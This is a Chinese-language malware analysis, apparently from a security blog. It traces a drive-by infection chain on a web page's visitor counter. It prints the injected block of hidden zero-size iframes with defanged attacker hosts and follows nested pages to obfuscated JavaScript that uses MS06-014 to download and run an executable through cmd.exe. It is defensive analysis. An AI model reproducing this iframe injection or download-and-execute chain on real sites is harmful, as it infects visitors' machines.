问题出在该网页所用的计数器代码上:
/--- <script src="hxxp://www.h*c**jj***d.com/wfcx/count/online.asp"></script> ---/
看看hxxp://www.h*c**jj***d.com/wfcx/count/online.asp 的代码:
/--- <iframe src=hxxp://user*.free.77**16*9.net/%73%61%74%61%6E%6C%73%78/sa.htm width=100 height=0></iframe><iframe src="hxxp://web**.*59***cn.cn/siyua/index.htm" width=100 height=0></iframe><iframe src="hxxp://web**.*59***cn.cn/siyua/index.htm" width=100 height=0></iframe><iframe src="hxxp://web**.*59***cn.cn/siyua/index.htm" width=100 height=0></iframe><iframe src="hxxp://web**.*59***cn.cn/bzsiyu/index.htm" width=100 height=0></iframe><iframe src="hxxp://web**.*59***cn.cn/bzsiyu/index.htm" width=100 height=0></iframe><iframe src="hxxp://hack**t*ao.q**yun.net/" width=100 height=0></iframe> <iframe src=hxxp://w**.7***373*4.cn/reg.htm?a width=100 height=0 frameborder=0></iframe><iframe src="hxxp://c*.th*e**c.cn/hacktao/" width=100 height=0></iframe> <iframe src="hxxp://M**.thIe**c.cn/siyua/" width=100 height=0></iframe> <iframe src="hxxp://M**.thIe**c.cn/siyua/" width=0 height=0></iframe> <iframe src="hxxp://b**zsiyua*.5***12j.com/" width=0 height=0></iframe> <iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe> <iframe src="hxxp://**siyua*.host**1.8**ma*k.com/1.htm" width=0 height=0></iframe><iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe> <iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe> <iframe src=hxxp://www.m**8*585**3.com.cn/index.htm width=0 height=0></iframe> <iframe src=hxxp://www.m**8*585**3.cn/muma/index.htm width=0 height=0></iframe> <iframe src=hxxp://www.n*8*585**3.cn/index.htm width=0 height=0></iframe> <iframe src=hxxp://www.m**8*585**3.cn/gogo/index.htm width=0 height=0></iframe><iframe src=hxxp://www.m**8*585**3.com.cn/index.htm width=0 height=0></iframe> <iframe src=hxxp://www.m**8*585**3.cn/muma/index.htm width=0 height=0></iframe> <iframe src=hxxp://www.n*8*585**3.cn/index.htm width=0 height=0></iframe> <iframe src=hxxp://www.m**8*585**3.cn/gogo/index.htm width=0 height=0></iframe><iframe width=0 height=0></iframe><iframe width=0 height=0></iframe><iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe> <iframe src=hxxp://w**.m**h*88***88.cn/ad.htm?a width=100 height=0 frameborder=0></iframe> <iframe src=hxxp://w**.7***373*4.cn/reg.htm?a width=100 height=0 frameborder=0></iframe><iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe> <iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe> <iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe> <iframe height=0 width=0></iframe><iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe> <iframe src=hxxp://www.8***8o*u.cn/index.htm height=0 width=0></iframe><iframe src=hxxp://www.8***8o*u.cn/index.htm height=0 width=0></iframe><iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe> <iframe src=hxxp://www.m**ht*engl*ong.com/mm.htm height=0 width=0></iframe><iframe src=hxxp://www.m**ht*engl*ong.com/mm.htm height=0 width=0></iframe><iframe src=hxxp://www.m**ht*engl*ong.com/mm.htm height=0 width=0></iframe><iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe> <iframe src="hxxp://userI.free**2.7**716*9.net/siyua/" width=0 height=0></iframe><iframe src=hxxp://www.8***8o*u.cn/ip/1.htm height=0 width=0></iframe><iframe src=hxxp://www.8***8o*u.cn/ip/1.htm height=0 width=0></iframe><iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe> <iframe src="hxxp://userI.free**2.7**716*9.net/siyua/" width=0 height=0></iframe><iframe src=hxxp://www.8***8o*u.cn/ip/1.htm height=0 width=0></iframe> document.write("<a href=hxxp://www.h*c**jj***d.com/wfcx/count/ShowOnline.asp title=查看当前在线人数列表><font color=red>当前在线<strong>1</strong>人</font></a>") ---/
挂的东东还真多~
随便找了 hxxp://w**.7***373*4.cn/reg.htm?a 来分析。代码为:
/--- <iframe src=dog.htm width=1 height=0></iframe> <script src=haha.js></script> <script src='hxxp://s*89.cnzz.com/stat.php?id=5*372*23&web_id=5*372*23&show=pic2' language='JavaScript' charset='gb2312'></script> ---/ hxxp://w**.7***373*4.cn/dog.htm 的内容为: /--- <iframe src=hxxp://a*a.1***8d*d.net/ww/new04.htm?xinjiang width=0 height=0></iframe ---/ hxxp://a*a.1***8d*d.net/ww/new04.htm?xinjiang 的内容为: /--- <iframe width='0' height='0' src='hxxp://a*a.1***8d*d.net/aa/kl.htm'></iframe> <script language="javascript" type="text/javascript" src="hxxp://js.users.51.la/12**996*44.js"></script> ---/
hxxp://a*a.1***8d*d.net/aa/kl.htm 的内容为加密的JavaScript代码,经2次解密,得到原始代码,功能是若不存在Cookies变量OK,则创建,并引入漏洞利用代码:
/--- <script src=hxxp:a*a.1***8d*d.net//aa//1.js><//script> <script src=hxxp:a*a.1***8d*d.net//aa//b.js><//script><script src=hxxp:a*a.1***8d*d.net//aa//pps.js><//script> ---/
并下载 hxxp://down**.1***8d*dI*.net/bb/bd.cab
hxxp://a*a.1***8d*d.net/aa/1.js 功能是利用 MS06014漏洞下载hxxp://down**.1***8d*dI*.net/bb/014.exe,保存为ntuser.com,利用cmd.exe来运行。
